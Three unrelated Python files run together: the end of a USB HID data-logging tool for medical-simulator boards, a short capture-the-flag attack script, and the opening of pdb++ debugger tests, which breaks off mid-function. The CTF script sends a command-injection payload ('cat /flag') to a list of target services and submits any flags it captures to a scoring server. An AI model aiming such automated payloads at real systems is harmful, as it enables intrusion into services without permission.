bytes.fromhex("3f3ebb00b127ff00ff00ff00ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") DEFAULT_WRITE_DATA = WRITE_DATA WRITE_DATA_CMD_I = bytes.fromhex("3f3ebb00b127ff00ff00ff0049ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") # start streaming command: # 3f 04 82 00 00 WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") WRITE_DATA_CMD_START_ = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") # start streaming command for station 0x303: WRITE_DATA_CMD_START_0x304 = bytes.fromhex("3f048d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") # Get Board Type command: # 01h 00h 00h 01h WRITE_DATA_CMD_GET_BOARD_TYPE = bytes.fromhex("3f040100000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") # WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") # WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") #.........................................................##........................................ WRITE_DATA_CMD_S = bytes.fromhex("3f3ebb00b127ff00ff00ff0053ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") # 'A' - keep Alive + fast BLE update (every 20 msec) WRITE_DATA_CMD_A = bytes.fromhex("3f3ebb00b127ff00ff00ff0041ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") # moderate BLE update rate every 50 mSec by 'M' command WRITE_DATA_CMD_M = bytes.fromhex("3f3ebb00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") # set_BSL_mode # WRITE_DATA_CMD_B = bytes.fromhex("3f3eaa00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") #0xAA Run BSL WRITE_DATA_CMD_B = bytes.fromhex("3f04aa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") SLEEP_AMOUNT = 0.002 # Read from HID every 2 milliseconds PRINT_TIME = 1.0 # Print every 1 second # PRINT_TIME = 0.5 # Print every 0.5 second #PRINT_TIME = 2 # Print every 2 second START_INDEX = 2 + 4 # Ignore the first two bytes, then skip the version (4 bytes) # ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 4 * 2 + 1, 2)) + [START_INDEX + 6 * 2,] ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 8 * 2 + 1, 2)) print("ANALOG_INDEX_LIST=",ANALOG_INDEX_LIST) # ANALOG_INDEX_LIST= [8, 10, 12, 14, 16, 18, 20, 22] LAP_ANALOG_INDEX_LIST = list(range(2,8 * 2 + 1, 2)) COUNTER_INDEX = 2 + 22 + 18 # Ignore the first two bytes, then skip XData1 (22 bytes) and OverSample (==XDataSlave1; 18 bytes) CMOS_INDEX = 2 + 2 # maybe + 4??? GBU_COUNTER_INDEX = 52 # 0 1 2 3 4 5 6 7 8 9 1011 # Received data: b'3f26 00 00 00 00 0674fc41 3f4efc70 0033a4513c5a0101210001000000650000000000000000000000167f070dd7aee89baff63fedcfcccb763acf041b00000010' # TORQUE INSERTION # global variables special_cmd = 0 def gui_loop(device): global prev_gbu_counter_change_time do_print = True print_time = 0.0 time = timer() handle_time = timer() write_time_capture = timer() prev_gbu_counter_change_time = timer() gbu_counter_change_time = timer() skip_write = 0 prev_counter = 0 send_stream_request_command_once = 1 # cnt = None # prev_cnt = None # value = None global special_cmd # global print_flag while True: # Reset the counter if (do_print): print_time = timer() # Write to the device # if send_stream_request_command_once == 1: # send_stream_request_command_once = 0 # if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA: # print("enforce streaming of data with command 0x82" # if device is attached enforce streaming of data. # device.write(WRITE_DATA_CMD_START) if special_cmd == 'I': if PRODUCT_ID == PRODUCT_ID_STATION: WRITE_DATA = WRITE_DATA_CMD_START_0x304 else: WRITE_DATA = WRITE_DATA_CMD_START device.write(WRITE_DATA) print("special_cmd Start") special_cmd = 0 # elif special_cmd == 'S': # WRITE_DATA = WRITE_DATA_CMD_GET_BOARD_TYPE # device.write(WRITE_DATA) # print("special_cmd CMD_GET_BOARD_TYPE") # # print_flag = 1 # special_cmd = 0 # elif special_cmd == 'A': # WRITE_DATA = WRITE_DATA_CMD_A # print("special_cmd A -> keep Alive + fast BLE update (every 20 msec)") # special_cmd = 0 # elif special_cmd == 'M': # WRITE_DATA = WRITE_DATA_CMD_M # print("special_cmd M -> moderate BLE update rate every 50 mSec") # special_cmd = 0 # elif special_cmd == 'B': # WRITE_DATA = WRITE_DATA_CMD_B # device.write(WRITE_DATA) # print("special_cmd B -> set_BSL_mode --- this will stop HID communication with this GUI") # special_cmd = 0 # else: # WRITE_DATA = DEFAULT_WRITE_DATA cycle_time = timer() - time # print("cycle timer: %.10f" % cycle_time) # If not enough time has passed, sleep for SLEEP_AMOUNT seconds sleep_time = SLEEP_AMOUNT - (cycle_time) # Measure the time time = timer() # print(" ") # Read the packet from the device value = device.read(READ_SIZE, timeout=READ_TIMEOUT) # Update the GUI if len(value) >= READ_SIZE: # save into file: analog = [(int(value[i + 1]) << 8) + int(value[i]) for i in LAP_ANALOG_INDEX_LIST] channel_0 = analog[0] channel_1 = analog[1] channel_2 = analog[2] channel_3 = analog[3] channel_4 = analog[4] counter = (int(value[COUNTER_INDEX + 1]) << 8) + int(value[COUNTER_INDEX]) count_dif = counter - prev_counter GBU_COUNTER_INDEX = 2+51 # need to add 2 since we have two bytes of lengths. gbu_counter = (int(value[GBU_COUNTER_INDEX + 1]) << 8) + int(value[GBU_COUNTER_INDEX]) gbu_counter2 = (int(value[GBU_COUNTER_INDEX]) << 8) + int(value[GBU_COUNTER_INDEX+1]) global file1 global prev_gbu_counter # global prev_gbu_counter_change_time #if count_dif > 1 : # L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), " <<<<<--- " ,"\n" ] #else: # L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), "\n" ] L = [ str(channel_0),", ", str(channel_1), ", " , str(channel_2),", " , str(channel_3),", " , str(channel_4), "\n" ] # file1.writelines(L) # handler(value, do_print=do_print) # print("Received data: %s" % hexlify(value)) Handler_Called = (timer() - handle_time) if Handler_Called > 0.002 : # if Handler_Called > 0.02 : #print("handler called: %.6f" % Handler_Called) global print_every if gbu_counter2 != prev_gbu_counter: # check for 0x3f35ff0f then the rest if value[0] == 0x3f and value[1] == 0x35 and value[2] == 0xff and value[3] == 0x0f: print_every = 200 delta_time = timer() - prev_gbu_counter_change_time gbu_counter_change_time = timer() # print_every = print_every + 1 if print_every >= 200: print_every = 0 print("delta_time: %.1f" % delta_time, end="") L1 = [str(delta_time), "\n"] delta_time_str = "%.1f" %delta_time # save only 1 digit after decimal point event_time = get_time() L1 = [delta_time_str, " ",event_time, "\n"] # global FILE1_PATH # file1 = open(FILE1_PATH,"w") file1.writelines(L1) # file1.close() # print(" Received data: %s" % str(gbu_counter)) # print(" Received data: %06x" % gbu_counter) # print(" Received data: %06x " % gbu_counter2 + "%f" %v) print(" Received data: %06d" % gbu_counter2 + " time: %s" %event_time) print(" Received data: %s" % hexlify(value)) if value[0] == 0x3f and value[1] == 0x35 and value[2] == 0xff and value[3] == 0x0f: prev_gbu_counter = gbu_counter2 prev_gbu_counter_change_time = gbu_counter_change_time # print("time: %.6f" % time) handle_time = timer() prev_counter = counter # Update the do_print flag do_print = (timer() - print_time) >= PRINT_TIME def handler(value, do_print=False): if do_print: print("Received data: %s" % hexlify(value)) return # do without gui PROGRESS_BAR_LEN = 300 LONG_PROGRESS_BAR_LEN = 590 def init_parser(): parser = argparse.ArgumentParser( description="Read the HID data from target board.\nIf no argument is given, the program exits." ) parser.add_argument( "-v", "--vendor", dest="vendor_id", metavar="VENDOR_ID", type=int, nargs=1, required=False, help="connects to the device with the vendor ID" ) parser.add_argument( "-p", "--product", dest="product_id", metavar="PRODUCT_ID", type=int, nargs=1, required=False, help="connects to the device with that product ID" ) parser.add_argument( "-a", "--path", dest="path", metavar="PATH", type=str, nargs=1, required=False, help="connects to the device with the given path" ) return parser def main(): global VENDOR_ID global PRODUCT_ID PATH = None # open recording log file: # file1 = open("C:\Work\Python\HID_Util\src\log\log2.txt","w") # Parse the command line arguments parser = init_parser() args = parser.parse_args(sys.argv[1:]) # Initialize the flags according from the command line arguments avail_vid = args.vendor_id != None avail_pid = args.product_id != None avail_path = args.path != None id_mode = avail_pid and avail_vid path_mode = avail_path default_mode = (not avail_vid) and (not avail_pid) and (not avail_path) if (path_mode and (avail_pid or avail_vid)): print("The path argument can't be mixed with the ID arguments") return if ((not avail_path) and ((avail_pid and (not avail_vid)) or ((not avail_pid) and avail_vid))): print("Both the product ID and the vendor ID must be given as arguments") return if (default_mode): print("No arguments were given, defaulting to:") print("VENDOR_ID = %X" % VENDOR_ID) print("PRODUCT_ID = %X" % PRODUCT_ID) id_mode = True elif (id_mode): VENDOR_ID = args.vendor_id[0] PRODUCT_ID = args.product_id[0] #run over with 772 == 0x304 elif (path_mode): PATH = args.path[0] else: raise NotImplementedError device = None try: if (id_mode): try: print("try with default device:") print("VENDOR_ID = %X" % VENDOR_ID) print("PRODUCT_ID = %X" % PRODUCT_ID) device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID) except: print("wrong ID") print(" ") # 0x24B3 = 9395 # 0x2005 = 8197 for n in range(7): if device is None: try: # print("try with other device") VENDOR_ID = 0x24b3 # Simbionix PRODUCT_ID = 0x2000 + n # LAP_NEW_CAMERA. is 0x2005 # print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID) print("try with PID = %X " % PRODUCT_ID) # print("PRODUCT_ID = %X" % PRODUCT_ID) device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID) # device = hid.Device(vid=0x24B3, pid=0x2005) # print("success vid=0x24B3, pid=0x2005 !!") except: print("wrong ID2") # VENDOR_ID = 2047 # PRODUCT_ID = 304 # 0x2047 = 8263 # 0x304 = 772 # 0x0301 // Product ID (PID) - base for Prime products family for n in range(len(PRODUCT_ID_types)): if device is None: try: # print("try with other device") VENDOR_ID = 0x2047 # Texas Instrument PRODUCT_ID = 0x301 + n # BOARD_TYPE_MAIN is 0x301 # print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID) print("try with PID = %X " % PRODUCT_ID) # print("PRODUCT_ID = %X" % PRODUCT_ID) device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID) # device = hid.Device(vid=0x24B3, pid=0x2005) # print("success vid=0x24B3, pid=0x2005 !!") except: print("wrong ID2") if device is None: print("no device attached") else: print("VENDOR_ID = %X" % VENDOR_ID) print("PRODUCT_ID = %X" % PRODUCT_ID) if PRODUCT_ID in PRODUCT_ID_types: print(PRODUCT_ID_types[PRODUCT_ID]) global special_cmd if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA: special_cmd = 'I' elif (path_mode): device = hid.Device(path=PATH) else: raise NotImplementedError print(" ") print(" --------------------------------------") print(" Please press <Enter> to stop recording") print(" --------------------------------------") print(" ") # Create thread that calls threading.Thread(target=gui_loop, args=(device,), daemon=True).start() input() print("Recording start: ", start_date_time) print("Recording end : ", get_date_time()) print("\n","Recording result at: ", FILE1_PATH) finally: global file1 file1.close() #to change file access modes if device != None: device.close() if __name__ == "__main__": main()
xingmeng.py
# Author: HeliantHuS # IDE: VIM # System Env: Kali Linux import requests import re import threading # submit flag address flagServer = "" # Flag Server Token token = "" # Attack Main attack function def Attack(target: str, payload: dict): try: data = payload response = requests.post(target, data=data).content.decode() flag = re.findall("flag{.*?}", response, re.S) if len(flag) > 0: flag = flag[0] print(f"[+]{target}: {flag}") SubmitFlag(target, flag) else: except: pass # SubmitFlag emm...submit flag to flagserver def SubmitFlag(target: str, flag: str): # Request Header | Add Appcation Json headers = { "Content-Type": "application/json; charset=UTF-8" } data = { "flag": flag, "token": token } response = requests.post(flagServer, headers=headers, data=data).json() # Not Use File Redirect print(f"{target}, {response}") with open("result.txt", "a+") as fp: fp.write(f"[+]{target}, {response} \n") # ItemDWList | is example. def ItemDWList(start, end, me): return [f"http://127.0.0.1:1{str(i).rjust(2, '0')}80" for i in range(start, end+1) if i != me] if __name__ == "__main__": # target list dw = [] # dw example # print(ItemDWList(1, 16, 1)) payload = { "test": "cat /flag" } for i in dw: t = threading.Thread(target=Attack, args=(i, payload)) t.start() t.join()
test_pdb.py
# -*- coding: utf-8 -*- from __future__ import print_function import bdb import inspect import os.path import re import sys import traceback from io import BytesIO import py import pytest try: from itertools import zip_longest except ImportError: from itertools import izip_longest as zip_longest # Make sure that we are really using our pdb module. # (I.e. without pytest's monkeypatched set_trace). # Do this only once though, for when this is file is copied. if not hasattr(sys.modules.get("pdb", None), "_ensured_our_pdb"): sys.modules.pop("pdb") import pdb # noqa: E402 isort:skip pdb._ensured_our_pdb = True pytest_plugins = ["pytester"] class FakeStdin: def __init__(self, lines): self.lines = iter(lines) def readline(self): try: line = next(self.lines) + '\n' sys.stdout.write(line) return line except StopIteration: return '' class ConfigTest(pdb.DefaultConfig): highlight = False use_pygments = False prompt = '# ' # because + has a special meaning in the regexp editor = 'emacs' stdin_paste = 'epaste' disable_pytest_capturing = False class ConfigWithHighlight(ConfigTest): highlight = True class ConfigWithPygments(ConfigTest): use_pygments = True class ConfigWithPygmentsAndHighlight(ConfigWithPygments, ConfigWithHighlight): pass class PdbTest(pdb.Pdb): use_rawinput = 1 def __init__(self, *args, **kwds): readrc = kwds.pop("readrc", False) nosigint = kwds.pop("nosigint", True) kwds.setdefault('Config', ConfigTest) if sys.version_info >= (3, 6): super(PdbTest, self).__init__(*args, readrc=readrc, **kwds) else: super(PdbTest, self).__init__(*args, **kwds) # Do not install sigint_handler in do_continue by default. self.nosigint = nosigint def _open_editor(self, editcmd): print("RUN %s" % editcmd) def _open_stdin_paste(self, cmd, lineno, filename, text): print("RUN %s +%d" % (cmd, lineno)) print(repr(text)) def do_shell(self, arg): """Track when do_shell gets called (via "!"). This is not implemented by default, but we should not trigger it via parseline unnecessarily, which would cause unexpected results if somebody uses it. """ print("do_shell_called: %r" % arg) return self.default(arg) def set_trace_via_module(frame=None, cleanup=True, Pdb=PdbTest, **kwds): """set_trace helper that goes through pdb.set_trace. It injects Pdb into the globals of pdb.set_trace, to use the given frame. """ if frame is None: frame = sys._getframe().f_back if cleanup: pdb.cleanup() class PdbForFrame(Pdb): def set_trace(self, _frame, *args, **kwargs): super(PdbForFrame, self).set_trace(frame, *args, **kwargs) newglobals = pdb.set_trace.__globals__.copy() newglobals['Pdb'] = PdbForFrame new_set_trace = pdb.rebind_globals(pdb.set_trace, newglobals) new_set_trace(**kwds) def set_trace(frame=None, cleanup=True, Pdb=PdbTest, **kwds): """set_trace helper for tests, going through Pdb.set_trace directly.""" if frame is None: frame = sys._getframe().f_back if cleanup: pdb.cleanup() Pdb(**kwds).set_trace(frame) def xpm(): pdb.xpm(PdbTest) def runpdb(func, input): oldstdin = sys.stdin oldstdout = sys.stdout oldstderr = sys.stderr # Use __dict__ to avoid class descriptor (staticmethod). old_get_terminal_size = pdb.Pdb.__dict__["get_terminal_size"] if sys.version_info < (3, ): text_type = unicode # noqa: F821 else: text_type = str class MyBytesIO(BytesIO): """write accepts unicode or bytes""" encoding = 'ascii' def __init__(self, encoding='utf-8'): self.encoding = encoding def write(self, msg): if isinstance(msg, text_type): msg = msg.encode(self.encoding) super(MyBytesIO, self).write(msg) def get_unicode_value(self): return self.getvalue().decode(self.encoding).replace( pdb.CLEARSCREEN, "<CLEARSCREEN>\n" ).replace(chr(27), "^[") # Use a predictable terminal size. pdb.Pdb.get_terminal_size = staticmethod(lambda: (80, 24)) try: sys.stdin = FakeStdin(input) sys.stdout = stdout = MyBytesIO() sys.stderr = stderr = MyBytesIO() func() except InnerTestException: pass except bdb.BdbQuit: print("!! Received unexpected bdb.BdbQuit !!") except Exception: # Make it available for pytests output capturing. print(stdout.get_unicode_value(), file=oldstdout) raise finally: sys.stdin = oldstdin sys.stdout = oldstdout sys.stderr = oldstderr pdb.Pdb.get_terminal_size = old_get_terminal_size stderr = stderr.get_unicode_value() if stderr: # Make it available for pytests output capturing. print(stdout.get_unicode_value()) raise AssertionError("Unexpected output on stderr: %s" % stderr) return stdout.get_unicode_value().splitlines() def extract_commands(lines): cmds = [] prompts = {'# ', '(#) ', '((#)) ', '(((#))) '} for line in lines: for prompt in prompts: if line.startswith(prompt): cmds.append(line[len(prompt):]) continue return cmds shortcuts = [ ('[', '\\['), (']', '\\]'), ('(', '\\('), (')', '\\)'), ('^', '\\^'), ('<COLORCURLINE>', r'\^\[\[44m\^\[\[36;01;44m *[0-9]+\^\[\[00;44m'), ('<COLORNUM>', r'\^\[\[36;01m *[0-9]+\^\[\[00m'), ('<COLORLNUM>', r'\^\[\[36;01m'), ('<COLORRESET>', r'\^\[\[00m'), ('NUM', ' *[0-9]+'), ] def cook_regexp(s): for key, value in shortcuts: s = s.replace(key, value) return s def run_func(func, expected): """Runs given function and returns its output along with expected patterns. It does not make any assertions. To compare func's output with expected lines, use `check` function. """ expected = expected.strip().splitlines() # Remove comments. expected = [re.split(r'\s+###', line)[0] for line in expected] commands = extract_commands(expected) expected = list(map(cook_regexp, expected)) return expected, runpdb(func, commands) def count_frames(): f = sys._getframe() i = 0 while f is not None: i += 1 f = f.f_back return i class InnerTestException(Exception): """Ignored by check().""" pass def check(func, expected): expected, lines = run_func(func, expected) maxlen = max(map(len, expected)) all_ok = True print() for pattern, string in zip_longest(expected, lines): if pattern is not None and string is not None: ok = re.match(pattern, string) else: ok = False if pattern is None: pattern = '<None>' if string is None: string = '<None>' # Use "$" to mark end of line with trailing space if re.search(r'\s+$', string): string += '$' if re.search(r'\s+$', pattern): pattern += '$' pattern = pattern.replace("\t", "\\t") string = string.replace("\t", "\\t") print(pattern.ljust(maxlen+1), '| ', string, end='') if ok: print() else: print(pdb.Color.set(pdb.Color.red, ' <<<<<')) all_ok = False assert all_ok def test_config_terminalformatter(monkeypatch): from pdb import DefaultConfig, Pdb import pygments.formatters assert DefaultConfig.use_terminal256formatter is None monkeypatch.setenv("TERM", "") p = Pdb(Config=DefaultConfig) assert p._init_pygments() is True assert isinstance(p._fmt, pygments.formatters.TerminalFormatter) p = Pdb(Config=DefaultConfig) monkeypatch.setenv("TERM", "xterm-256color") assert p._init_pygments() is True assert isinstance(p._fmt, pygments.formatters.Terminal256Formatter) class Config(DefaultConfig): use_terminal256formatter = False p = Pdb(Config=Config) assert p._init_pygments() is True assert isinstance(p._fmt, pygments.formatters.TerminalFormatter) # Cover using cached _fmt. assert p._init_pygments() is True def test_runpdb(): def fn(): set_trace() a = 1 b = 2 c = 3 return a+b+c check(fn, """ [NUM] > .*fn() -> a = 1 5 frames hidden .* # n [NUM] > .*fn() -> b = 2 5 frames hidden .* # n [NUM] > .*fn() -> c = 3 5 frames hidden .* # c """) def test_set_trace_remembers_previous_state(): def fn(): a = 1 set_trace() a = 2 set_trace(cleanup=False) a = 3 set_trace(cleanup=False) a = 4 return a check(fn, """ [NUM] > .*fn() -> a = 2 5 frames hidden .* # display a # c [NUM] > .*fn() -> a = 3 5 frames hidden .* a: 1 --> 2 # c [NUM] > .*fn() -> a = 4 5 frames hidden .* a: 2 --> 3 # c """) def test_set_trace_remembers_previous_state_via_module(): def fn(): a = 1 set_trace_via_module() a = 2 set_trace_via_module(cleanup=False) a = 3 set_trace_via_module(cleanup=False) a = 4 return a check(fn, """ [NUM] > .*fn() -> a = 2 5 frames hidden .* # display a # c [NUM] > .*fn() -> a = 3 5 frames hidden .* a: 1 --> 2 # c [NUM] > .*fn() -> a = 4 5 frames hidden .* a: 2 --> 3 # c """) def test_forget_with_new_pdb(): """Regression test for having used local.GLOBAL_PDB in forget. This caused "AttributeError: 'NewPdb' object has no attribute 'lineno'", e.g. when pdbpp was used before pytest's debugging plugin was setup, which then later uses a custom Pdb wrapper. """ def fn(): set_trace() class NewPdb(PdbTest, pdb.Pdb): def set_trace(self, *args): print("new_set_trace") return super(NewPdb, self).set_trace(*args) new_pdb = NewPdb() new_pdb.set_trace() check(fn, """ [NUM] > .*fn() -> class NewPdb(PdbTest, pdb.Pdb): 5 frames hidden .* # c new_set_trace --Return-- [NUM] .*set_trace()->None -> return super(NewPdb, self).set_trace(\\*args) 5 frames hidden .* # l NUM .* NUM .* NUM .* NUM .* NUM .* NUM .* NUM .* NUM .* NUM .* NUM .* NUM .* # c """) def test_global_pdb_with_classmethod(): def fn(): global pdb set_trace() assert isinstance(pdb.local.GLOBAL_PDB, PdbTest) class NewPdb(PdbTest, pdb.Pdb): def set_trace(self, *args): print("new_set_trace") assert pdb.local.GLOBAL_PDB is self ret = super(NewPdb, self).set_trace(*args) assert pdb.local.GLOBAL_PDB is self return ret new_pdb = NewPdb() new_pdb.set_trace() check(fn, """ [NUM] > .*fn() -> assert isinstance(pdb.local.GLOBAL_PDB, PdbTest) 5 frames hidden .* # c new_set_trace [NUM] .*set_trace() -> assert pdb.local.GLOBAL_PDB is self 5 frames hidden .* # c """) def test_global_pdb_via_new_class_in_init_method(): def fn(): set_trace() first = pdb.local.GLOBAL_PDB assert isinstance(pdb.local.GLOBAL_PDB, PdbTest) class PdbLikePytest(object): @classmethod def init_pdb(cls): class NewPdb(PdbTest, pdb.Pdb): def set_trace(self, frame): print("new_set_trace") super(NewPdb, self).set_trace(frame) return NewPdb() @classmethod def set_trace(cls, *args, **kwargs): frame = sys._getframe().f_back pdb_ = cls.init_pdb(*args, **kwargs) return pdb_.set_trace(frame) PdbLikePytest.set_trace() second = pdb.local.GLOBAL_PDB assert first != second PdbLikePytest.set_trace() third = pdb.local.GLOBAL_PDB assert third == second check(fn, """ [NUM] > .*fn() -> first = pdb.local.GLOBAL_PDB 5 frames hidden .* # c new_set_trace [NUM] > .*fn() -> second = pdb.local.GLOBAL_PDB 5 frames hidden .* # c new_set_trace [NUM] > .*fn() -> third = pdb.local.GLOBAL_PDB 5 frames hidden .* # c """) def test_global_pdb_via_existing_class_in_init_method(): def fn(): set_trace() first = pdb.local.GLOBAL_PDB assert isinstance(pdb.local.GLOBAL_PDB, PdbTest) class NewPdb(PdbTest, pdb.Pdb): def set_trace(self, frame): print("new_set_trace") super(NewPdb, self).set_trace(frame) class PdbViaClassmethod(object): @classmethod def init_pdb(cls): return NewPdb() @classmethod def set_trace(cls, *args, **kwargs): frame = sys._getframe().f_back pdb_ = cls.init_pdb(*args, **kwargs) return pdb_.set_trace(frame) PdbViaClassmethod.set_trace() second = pdb.local.GLOBAL_PDB assert first != second PdbViaClassmethod.set_trace() third = pdb.local.GLOBAL_PDB assert third == second check(fn, """ [NUM] > .*fn() -> first = pdb.local.GLOBAL_PDB 5 frames hidden .* # c new_set_trace [NUM] > .*fn() -> second = pdb.local.GLOBAL_PDB 5 frames hidden .* # c new_set_trace [NUM] > .*fn() -> third = pdb.local.GLOBAL_PDB 5 frames hidden .* # c """) def test_global_pdb_can_be_skipped(): def fn(): set_trace() first = pdb.local.GLOBAL_PDB assert isinstance(first, PdbTest) class NewPdb(PdbTest, pdb.Pdb): def set_trace(self, *args): print("new_set_trace") assert pdb.local.GLOBAL_PDB is not self ret = super(NewPdb, self).set_trace(*args) assert pdb.local.GLOBAL_PDB is not self return ret new_pdb = NewPdb(use_global_pdb=False) new_pdb.set_trace() assert pdb.local.GLOBAL_PDB is not new_pdb set_trace(cleanup=False) assert pdb.local.GLOBAL_PDB is not new_pdb check(fn, """ [NUM] > .*fn() -> first = pdb.local.GLOBAL_PDB 5 frames hidden .* # c new_set_trace [NUM] .*set_trace() -> assert pdb.local.GLOBAL_PDB is not self 5 frames hidden .* # readline_ = pdb.local.GLOBAL_PDB.fancycompleter.config.readline # assert readline_.get_completer() != pdb.local.GLOBAL_PDB.complete # c [NUM] > .*fn() -> assert pdb.local.GLOBAL_PDB is not new_pdb 5 frames hidden .* # c """) def test_global_pdb_can_be_skipped_unit(monkeypatch_pdb_methods): """Same as test_global_pdb_can_be_skipped, but with mocked Pdb methods.""" def fn(): set_trace() first = pdb.local.GLOBAL_PDB assert isinstance(first, PdbTest) class NewPdb(PdbTest, pdb.Pdb): def set_trace(self, *args): print("new_set_trace") assert pdb.local.GLOBAL_PDB is not self ret = super(NewPdb, self).set_trace(*args) assert pdb.local.GLOBAL_PDB is not self return ret new_pdb = NewPdb(use_global_pdb=False) new_pdb.set_trace() assert pdb.local.GLOBAL_PDB is not new_pdb set_trace(cleanup=False) assert pdb.local.GLOBAL_PDB is not new_pdb check(fn, """ === set_trace new_set_trace === set_trace === set_trace """) def test_global_pdb_can_be_skipped_but_set(): def fn(): set_trace() first = pdb.local.GLOBAL_PDB assert isinstance(first, PdbTest) class NewPdb(PdbTest, pdb.Pdb): def set_trace(self, *args): print("new_set_trace") assert pdb.local.GLOBAL_PDB is self ret = super(NewPdb, self).set_trace(*args) assert pdb.local.GLOBAL_PDB is self return ret new_pdb = NewPdb(use_global_pdb=False, set_global_pdb=True) new_pdb.set_trace() assert pdb.local.GLOBAL_PDB is new_pdb set_trace(cleanup=False) assert pdb.local.GLOBAL_PDB is new_pdb check(fn, """ [NUM] > .*fn() -> first = pdb.local.GLOBAL_PDB 5 frames hidden .* # c new_set_trace [NUM] .*set_trace() -> assert pdb.local.GLOBAL_PDB is self 5 frames hidden .* # readline_ = pdb.local.GLOBAL_PDB.fancycompleter.config.readline # assert readline_.get_completer() == pdb.local.GLOBAL_PDB.complete # c new_set_trace [NUM] > .*fn() -> assert pdb.local.GLOBAL_PDB is new_pdb 5 frames hidden .* # c """) def test_global_pdb_can_be_skipped_but_set_unit(monkeypatch_pdb_methods): def fn(): set_trace() first = pdb.local.GLOBAL_PDB assert isinstance(first, PdbTest) class NewPdb(PdbTest, pdb.Pdb): def set_trace(self, *args): print("new_set_trace") assert pdb.local.GLOBAL_PDB is self ret = super(NewPdb, self).set_trace(*args) assert pdb.local.GLOBAL_PDB is self return ret new_pdb = NewPdb(use_global_pdb=False, set_global_pdb=True) new_pdb.set_trace() assert pdb.local.GLOBAL_PDB is new_pdb set_trace(cleanup=False) assert pdb.local.GLOBAL_PDB is new_pdb check(fn, """ === set_trace new_set_trace === set_trace new_set_trace === set_trace """) def test_single_question_mark(): def fn(): def f2(x, y): """Return product of x and y""" return x * y set_trace() a = 1 b = 2 c = 3 return a+b+c # import pdb; pdb.set_trace() check(fn, """ [NUM] > .*fn() -> a = 1 5 frames hidden .* # f2 <function .*f2 at .*> # f2? .*Type:.*function .*String Form:.*<function .*f2 at .*> ^[[31;01mFile:^[[00m {filename} .*Definition:.*f2(x, y) .*Docstring:.*Return product of x and y # c """.format( filename=__file__, )) def test_double_question_mark(): def fn(): def f2(x, y): """Return product of x and y""" return x * y set_trace() a = 1 b = 2 c = 3 return a+b+c check(fn, r""" [NUM] > .*fn() -> a = 1 5 frames hidden .* # f2 <function .*f2 at .*> # f2?? .*Type:.*function .*String Form:.*<function .*f2 at .*> ^[[31;01mFile:^[[00m {filename} .*Definition:.*f2(x, y) .*Docstring:.*Return product of x and y .*Source:.* .* def f2(x, y): .* \"\"\"Return product of x and y\"\"\" .* return x \* y # c """.format( filename=__file__, )) def test_single_question_mark_with_existing_command(monkeypatch): def mocked_inspect(self, arg): print("mocked_inspect: %r" % arg) monkeypatch.setattr(PdbTest, "do_inspect", mocked_inspect) def fn(): mp = monkeypatch # noqa: F841 class MyClass: pass a = MyClass() # noqa: F841 set_trace() check(fn, """ --Return-- [NUM] > .*fn()->None -> set_trace() 5 frames hidden .* # a? mocked_inspect: 'a' # a.__class__? mocked_inspect: 'a.__class__' # !!a? # !a? do_shell_called: a? \\*\\*\\* SyntaxError: # mp.delattr(pdb.local.GLOBAL_PDB.__class__, "do_shell") # !a? \\*\\*\\* SyntaxError: # help a a(rgs) .* # c """) def test_up_local_vars(): def nested(): set_trace() return def fn(): xx = 42 # noqa: F841 nested() check(fn, """ [NUM] > .*nested() -> return 5 frames hidden .* # up [NUM] > .*fn() -> nested() # xx 42 # c """) def test_frame(): def a(): b() def b(): c() def c(): set_trace() return check(a, """ [NUM] > .*c() -> return 5 frames hidden .* # f {frame_num_a} [NUM] > .*a() -> b() # f [{frame_num_a}] > .*a() -> b() # c """.format(frame_num_a=count_frames() + 2 - 5)) @pytest.mark.skipif(sys.version_info < (3, 6), reason="only with f-strings") def test_fstrings(monkeypatch): def mocked_inspect(self, arg): print("mocked_inspect: %r" % arg) monkeypatch.setattr(PdbTest, "do_inspect", mocked_inspect) def f(): set_trace() check(f, """ --Return-- [NUM] > .* -> set_trace() 5 frames hidden .* # f"fstring" 'fstring' # f"foo"? mocked_inspect: 'f"foo"' # c """) def test_prefixed_strings(monkeypatch): def mocked_inspect(self, arg): print("mocked_inspect: %r" % arg) monkeypatch.setattr(PdbTest, "do_inspect", mocked_inspect) def f(): set_trace() check( f, """ --Return-- [NUM] > .* -> set_trace() 5 frames hidden .* # b"string" {bytestring!r} # u"string" {unicodestring!r} # r"string" 'string' # b"foo"? mocked_inspect: 'b"foo"' # r"foo"? mocked_inspect: 'r"foo"' # u"foo"? mocked_inspect: 'u"foo"' # c """.format(bytestring=b"string", unicodestring=u"string")) def test_up_down_arg(): def a(): b() def b(): c() def c(): set_trace() return check(a, """ [NUM] > .*c() -> return 5 frames hidden .* # up 3 [NUM] > .*runpdb() -> func() # down 1 [NUM] > .*a() -> b() # c """) def test_parseline(): def fn(): c = 42 set_trace() 